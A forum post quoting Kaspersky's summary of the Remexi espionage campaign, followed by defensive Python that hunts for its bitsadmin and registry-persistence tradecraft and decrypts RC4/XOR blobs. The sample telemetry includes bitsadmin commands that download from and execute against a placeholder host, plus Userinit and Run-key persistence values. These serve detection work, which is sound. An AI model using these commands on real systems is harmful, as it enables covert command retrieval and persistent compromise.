01 February 19, 07:17
![[Image: 190125-chafer-remexi.png]](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/25135938/190125-chafer-remexi.png)
Quote:Executive Summary
Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.
The malware can exfiltrate keystrokes, screenshots, and browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like the Microsoft Background Intelligent Transfer Service (BITS) client bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS, using .asp technology to handle the victims’ HTTP requests.
Remexi developers use the C programming language and the GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms, including scheduled tasks and the Userinit and Run registry keys in the HKLM hive.
XOR and RC4 encryption are used with quite long unique keys for different samples. Among all these random keys, the word “salamati” was once used, which means “health” in Farsi.
Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based on our original report shared with our APT Intelligence Reporting customers in November 2018. For more information please contact: intelreports@kaspersky.com
Technical analysis
The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used the GCC compiler on Windows in the MinGW environment.
Full reading:
https://securelist.com/chafer-used-remex...are/89538/
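The quoted summary names two pieces of tradecraft a defender can hunt for directly: bitsadmin.exe being used to pull commands and push data, and persistence through HKLM Run values and the Winlogon Userinit value. The following is an added example (not code from the Kaspersky report or from the forum post) that runs those two checks over a handful of constructed Sysmon-style process-creation (EventID 1) and registry-value-set (EventID 13) records. The event records, paths and the 203.0.113.x / C:\Users\Public values are made up for illustration; the bitsadmin switches and the stock Userinit value are real.

```python
"""Hunt over constructed Sysmon-style events for Remexi-style tradecraft:
bitsadmin.exe driving BITS jobs, and persistence via HKLM Run / Userinit."""
import re

# Stock Userinit value on a clean Windows install (case-insensitive compare);
# anything appended after the trailing comma is launched at logon.
DEFAULT_USERINIT = r"c:\windows\system32\userinit.exe,"

# bitsadmin switches that create, populate, start or chain execution onto a job.
BITS_SWITCHES = re.compile(
    r"/(transfer|create|addfile|resume|setnotifycmdline|complete)\b", re.IGNORECASE)

RUN_KEY = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
USERINIT_VALUE = re.compile(r"\\Winlogon\\Userinit$", re.IGNORECASE)

# Constructed sample telemetry (not real Remexi events).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high "
                    r"http://203.0.113.10/cmd.asp C:\Users\Public\cmd.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /SetNotifyCmdLine job1 C:\Users\Public\run.exe NULL"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\Users\Public\svc.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\svc.exe"},
    {"EventID": 13,  # benign: Userinit rewritten to its stock value
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,"},
]


def check_bitsadmin(event):
    """Return the job-related bitsadmin switches used (lower-cased), else []."""
    if event.get("EventID") != 1:
        return []
    if not event.get("Image", "").lower().endswith("\\bitsadmin.exe"):
        return []
    return [s.lower() for s in BITS_SWITCHES.findall(event.get("CommandLine", ""))]


def check_userinit(event):
    """True if a write to Winlogon\\Userinit deviates from the stock value."""
    if event.get("EventID") != 13:
        return False
    if not USERINIT_VALUE.search(event.get("TargetObject", "")):
        return False
    return event.get("Details", "").strip().lower() != DEFAULT_USERINIT


def check_run_key(event):
    """True if a value is written under HKLM\\...\\CurrentVersion\\Run or RunOnce."""
    return event.get("EventID") == 13 and bool(RUN_KEY.search(event.get("TargetObject", "")))


def hunt(events):
    """Return (event_index, rule_name, detail) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        switches = check_bitsadmin(ev)
        if switches:
            hits.append((i, "bitsadmin_job", ",".join(switches)))
        if check_userinit(ev):
            hits.append((i, "userinit_tampered", ev["Details"]))
        if check_run_key(ev):
            hits.append((i, "hklm_run_value", ev["TargetObject"]))
    return hits


if __name__ == "__main__":
    for idx, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"event[{idx}] {rule}: {detail}")
```

On a live host the same logic can be fed from Sysmon event logs; the Userinit comparison is the important one, since a legitimate write of the stock value (the last sample event) should not alert.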
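The summary also states that the samples use XOR and RC4 with long, per-sample keys (one of them being the string “salamati”). Below is an added example, not taken from the Kaspersky report or the forum post, of the two primitives as an analyst would implement them to decrypt extracted blobs. RC4 is checked against the standard public test vectors; the “C2 string” blobs are constructed inline by encrypting a made-up URL, and the choice of which key goes with which primitive is an assumption for illustration only.

```python
"""RC4 and repeating-key XOR decryptors for extracted blobs."""


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling followed by PRGA; encrypt and decrypt are identical."""
    if not key:
        raise ValueError("empty key")
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_repeating(key: bytes, data: bytes) -> bytes:
    """Repeating-key XOR; also its own inverse."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed sample material (assumption: which key pairs with which cipher
# is illustrative, not Remexi's actual layout). 192.0.2.10 is a documentation
# address.
RC4_KEY = b"salamati"
XOR_KEY = b"0f3a9c1e7b2d5a8846e1c0b9d7f2a3c4e5f6a7b8"
PLAINTEXT = b"http://192.0.2.10/update.asp"
RC4_BLOB = rc4(RC4_KEY, PLAINTEXT)
XOR_BLOB = xor_repeating(XOR_KEY, PLAINTEXT)


def decrypt_rc4_blob(blob: bytes = RC4_BLOB, key: bytes = RC4_KEY) -> bytes:
    """Recover plaintext from an RC4-encrypted blob."""
    return rc4(key, blob)


def decrypt_xor_blob(blob: bytes = XOR_BLOB, key: bytes = XOR_KEY) -> bytes:
    """Recover plaintext from a repeating-key-XOR blob."""
    return xor_repeating(key, blob)


if __name__ == "__main__":
    print(decrypt_rc4_blob().decode())
    print(decrypt_xor_blob().decode())
```

When the key is unknown, the XOR variant is the easier target: a long key reveals itself through repeating ciphertext structure, and known-plaintext fragments such as "http://" recover key bytes at the matching offsets.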